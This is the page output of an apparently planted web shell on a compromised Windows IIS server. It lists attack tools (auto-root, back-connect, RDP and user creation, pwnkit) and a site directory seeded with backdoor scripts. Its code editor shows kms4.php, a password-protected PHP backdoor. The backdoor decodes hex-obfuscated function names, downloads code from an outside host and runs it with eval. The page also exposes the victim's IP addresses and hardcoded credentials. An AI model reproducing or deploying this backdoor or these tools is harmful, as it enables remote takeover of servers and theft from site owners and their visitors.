Windows NT UNITE 10.0 build 20348 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
: 103.191.209.133 | : 3.138.107.85
Cant Read [ /etc/named.conf ]
8.0.30
IWPD_988(zjowvbyw)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
D: /
Inetpub /
vhosts /
hitcs.in /
ambitioneducationfoundation.com /
Result /
[ HOME SHELL ]
Name
Size
Permission
Action
PaxHeader
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
BioData (R07-928).doc
41.5
KB
-rw-rw-rw-
CAS4C67OCAEE8X8VCAVH63YICAVUP6...
2.36
KB
-rw-rw-rw-
CAW.jpg
8.37
KB
-rw-rw-rw-
Desert.jpg
826.11
KB
-rw-rw-rw-
Hydrangeas.jpg
581.33
KB
-rw-rw-rw-
SECURE.php
0
B
-rw-rw-rw-
Thumbs.db
22.5
KB
-rw-rw-rw-
UnknownSec.php
111.82
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
center
0
B
-rw-rw-rw-
eaaa.phtml
61.39
KB
-rw-rw-rw-
function.php
2.1
KB
-rw-rw-rw-
gecko-new.php
172.83
KB
-r--r--r--
images.jpg
8.72
KB
-rw-rw-rw-
img01.gif
1.77
KB
-rw-rw-rw-
kms4.php
629
B
-rw-rw-rw-
lin.asp
4.7
KB
-rw-rw-rw-
msf.aspx
681
B
-rw-rw-rw-
pwnkit
0
B
-rw-rw-rw-
test.php
39
B
-rw-rw-rw-
untitled.bmp
82.15
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : kms4.php
<?php // --- pop-up $user = "root"; $pass = "susudosu"; if (($_SERVER["PHP_AUTH_USER"] != $user) || (($_SERVER["PHP_AUTH_PW"]) != $pass)) { header("WWW-Authenticate: Basic realm=\"dvildance was here\""); header("HTTP/1.0 401 Unauthorized"); exit(); } // --- php shell $x="\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65"; $xx="\x73\x74\x72\x5f\x72\x6f\x74\x31\x33"; $xxx="\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65"; $xxxx="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65"; $sc="\x68\x74\x74\x70\x3a\x2f\x2f\x66\x75\x6b\x79\x2e\x79\x6e\x2e\x6c\x74\x2f\x63\x6d\x64"; @eval($x($xx($xxx($xxxx(file_get_contents($sc)))))); ?>
Close